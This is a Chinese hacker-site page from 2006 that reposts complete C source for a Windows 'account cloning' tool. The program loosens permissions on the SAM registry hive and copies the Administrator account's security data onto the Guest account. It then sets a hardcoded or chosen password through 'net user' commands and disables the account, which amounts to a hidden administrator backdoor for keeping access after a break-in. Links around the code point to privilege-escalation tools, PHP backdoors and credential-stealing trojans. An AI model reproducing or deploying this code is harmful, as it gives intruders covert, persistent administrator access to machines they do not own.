·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]C语言简单实现克隆帐户

热荐 ★★★★★

C语言简单实现克隆帐户

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-8-10 9:33:53

＃i nclude <Windows.h>
＃i nclude <Aclapi.h>
＃i nclude <stdio.h>
＃i nclude <stdlib.h>
＃i nclude <tchar.h>
#pragma comment (lib,"Advapi32.lib")

#define MAX_KEY_LENGTH 255
#define MAX_VALUE_NAME 16383

DWORD user_flag = 0;

TCHAR cloneUser[1024];

void QueryKey(HKEY hKey);
void banner();

void text_color(WORD color)
{
HANDLE console = GetStdHandle(STD_OUTPUT_HANDLE);
SetConsoleTextAttribute(console, color);
}

int main(int argc, char **argv)
{
DWORD dwRet;
LPSTR SamName = _T("MACHINE\SAM\SAM");
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pOldDacl = NULL;
PACL pNewDacl = NULL;
EXPLICIT_ACCESS ea;
HKEY hKey = NULL;
LPBYTE lpDataF=NULL;
HKEY cKey, uKey;
DWORD Type=REG_BINARY,SizeF=1024*2;
TCHAR command[1024];
TCHAR command1[1024];
int ret;

// 初始化变量
lpDataF = (LPBYTE) malloc(1024*2);
ZeroMemory(lpDataF,1024*2);

// 显示作者和相关信息
banner();

// 获取SAM主键的DACL
dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("Set Privilege (1) Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// 创建一个ACE，允许Everyone完全控制对象，并允许子对象继承此权限
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea, _T("Everyone"), KEY_ALL_ACCESS, SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);

// 将新的ACE加入DACL
dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("Set Privilege (2) Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// 更新SAM主键的DACL
dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("Set Privilege (3) Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

_tprintf(_T("[+]Set Privilege.."));
text_color(10);
_tprintf(_T("[OK]"));
text_color(7);

// 枚举用户
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\SAM\Domains\Account\Users\Names"),0, KEY_ALL_ACCESS,&uKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// 功能函数实现自动判断用户
QueryKey(uKey);

if(user_flag == 0){
text_color(12);
_tprintf(_T("The guest user may be delete!"));
text_color(7);
exit(0);
}

// 打开SAM的子键 1F4
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\SAM\Domains\Account\Users\000001F4"),
0, KEY_ALL_ACCESS, &hKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// 获得 1F4 的 F 键值
dwRet = RegQueryValueEx(hKey, _T("F"), NULL, &Type,lpDataF,&SizeF);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegQueryValueEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// 打开SAM的子键 1F5
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\SAM\Domains\Account\Users\000001F5"),
0, KEY_ALL_ACCESS, &cKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// clone
dwRet = RegSetValueEx(cKey,_T("F"),0, REG_BINARY,lpDataF,SizeF);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegSetValueEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}
text_color(7);
_tprintf(_T("[+]Clone Successfully.."));
text_color(10);
_tprintf(_T("[OK]"));
text_color(7);
_tprintf(_T("[+]Try to set user password.."));
text_color(10);
_tprintf(_T("[OK]"));
text_color(7);

// 禁用用户, 改密码
if(argc == 1)
{

//执行 net user xx pass
_tcscpy(command,_T("net user "));
_tcscat(command,cloneUser);
_tcscat(command, _T(" "));
_tcscat(command, "zzrjitop");
text_color(0);
ret = system(command);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail.."));
text_color(12);
_tprintf(_T("Fail"));
text_color(7);
exit(5);
}

//执行 net user xx /active:no
_tcscpy(command1,_T("net user "));
_tcscat(command1,cloneUser);
_tcscat(command1,_T(" /active:no"));
// _tprintf(command1);
text_color(0);
ret = system(command1);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail.."));
text_color(12);
_tprintf(_T("Fail"));
text_color(7);
exit(5);
}
text_color(14);
_tprintf(_T("[+]User: %s Password: zzrjitop"), cloneUser);
text_color(7);

}

if(argc ==2)
{

_tcscpy(command,_T("net user "));
_tcscat(command,cloneUser);
_tcscat(command, _T(" "));
_tcscat(command, argv[1]);
text_color(0);
ret = system(command);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail..
"));
text_color(12);
_tprintf(_T("
Fail
"));
text_color(7);
exit(5);
}
//_tprintf("%s",command);

//执行 net user xx /active:no
_tcscpy(command1,_T("net user "));
_tcscat(command1,cloneUser);
_tcscat(command1,_T(" /active:no"));
text_color(0);
ret = system(command1);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail..
"));
text_color(12);
_tprintf(_T("
Fail
"));
text_color(7);
exit(5);
}
text_color(14);
_tprintf(_T("[+]
User: %s Password: %s
"), cloneUser, argv[1]);
text_color(7);

}

goto FreeAndExit;

FreeAndExit:
if (hKey) RegCloseKey(hKey);
if (pNewDacl) LocalFree(pNewDacl);
// 还原SAM主键的DACL
if (pOldDacl) dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pOldDacl, NULL);
if (pSD) LocalFree(pSD);
return 0;
}

void QueryKey(HKEY hKey)
{
TCHAR achKey[MAX_KEY_LENGTH]; // buffer for subkey name
DWORD cbName; // size of name string
TCHAR achClass[MAX_PATH] = TEXT(""); // buffer for class name
DWORD cchClassName = MAX_PATH; // size of class string
DWORD cSubKeys=0; // number of subkeys
DWORD cbMaxSubKey; // longest subkey size
DWORD cchMaxClass; // longest class string
DWORD cValues=0; // number of values for key
DWORD cchMaxValue; // longest value name
DWORD cbMaxValueData; // longest value data
DWORD cbSecurityDescriptor; // size of security descriptor
FILETIME ftLastWriteTime; // last write time
DWORD type = REG_BINARY, Size=1024*2;
LPBYTE lpData=NULL;

DWORD i, retCode;
HKEY tKey;

DWORD cchValue = MAX_VALUE_NAME;

TCHAR fulPath[] =_T("SAM\SAM\Domains\Account\Users\Names\");
TCHAR temp[MAX_VALUE_NAME];
ZeroMemory(cloneUser,1024);

// Get the class name and the value count.
retCode = RegQueryInfoKey(
hKey, // key handle
achClass, // buffer for class name
&cchClassName, // size of class string
NULL, // reserved
&cSubKeys, // number of subkeys
&cbMaxSubKey, // longest subkey size
&cchMaxClass, // longest class string
&cValues, // number of values for this key
&cchMaxValue, // longest value name
&cbMaxValueData, // longest value data
&cbSecurityDescriptor, // security descriptor
&ftLastWriteTime); // last write time

// Enumerate the subkeys, until RegEnumKeyEx fails.

if (cSubKeys)
{
//printf( "
Number of subkeys: %d
", cSubKeys);

for (i=0; i<cSubKeys; i++)
{
cbName = MAX_KEY_LENGTH;
retCode = RegEnumKeyEx(hKey, i,
achKey,
&cbName,
NULL,
NULL,
NULL,
&ftLastWriteTime);
if (retCode == ERROR_SUCCESS)
{
//_tprintf(TEXT("(%d) %s
"), i+1, achKey);
ZeroMemory(temp,sizeof(temp));
_tcscpy(temp, fulPath);
_tcscat(temp,achKey);
//_tprintf(_T("%s
"), temp);

retCode = RegOpenKeyEx(HKEY_LOCAL_MACHINE, temp, 0, KEY_ALL_ACCESS,&tKey);
if (retCode != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), retCode);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
exit(0);
}

lpData = (LPBYTE)malloc(2*1024);
ZeroMemory(lpData,2*1024);

retCode = RegQueryValueEx(tKey, NULL, NULL, &type, lpData,&Size);
if (retCode != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegQueryValueEx Error: %d"), retCode);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
if(tKey) RegCloseKey(tKey);
exit(1);
}

if(type==0x1f5) {
text_color(7);
_tprintf(_T("[+]Starting clone %s.."), achKey);
text_color(10);
_tprintf(_T("[OK]
"));
text_color(7);
_tcscpy(cloneUser,achKey);
user_flag = 1;
break;
}

}
}
}

// Enumerate the key values.
}

void banner(){
_tprintf(_T("******************************************************"));
_tprintf(_T("* Clone account Tool http://www.eviloctal.com"));
_tprintf(_T("* Clone the 1F5 user"));
_tprintf(_T("* Usage: clone.exe or clone.exe pass"));
_tprintf(_T("*"));
text_color(12);
_tprintf(_T(" If clone successfully it was made by zz[E.S.t]"));
text_color(7);
_tprintf(_T("******************************************************"));

}

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：如何得到网页中的Frame的HTML接口

下一篇文章：自定义发IP包例子(C实例)

【字体：小大】

中介交易区

网游盗号木马实现手记	01-09
黑色技术蠕虫下载者[完整源码]	11-01
利用BCB自己打造QQ炸弹	10-23
从内存中加载并启动一个exe(delp	09-27
开启和关闭Windows xp 防火墙(de	09-27
让你的程序通过XP防火墙(delphi编	09-27
如何让你的程序安全通过windows防	08-20
如何透过程序来控制 Windows (XP	08-20
动易2005-2006算号器的源代码	08-11
API对注册表进行操作(Delphi编程	07-30
一段隐藏注册表项的代码	07-26
了解VB编写病毒的大体方法	07-02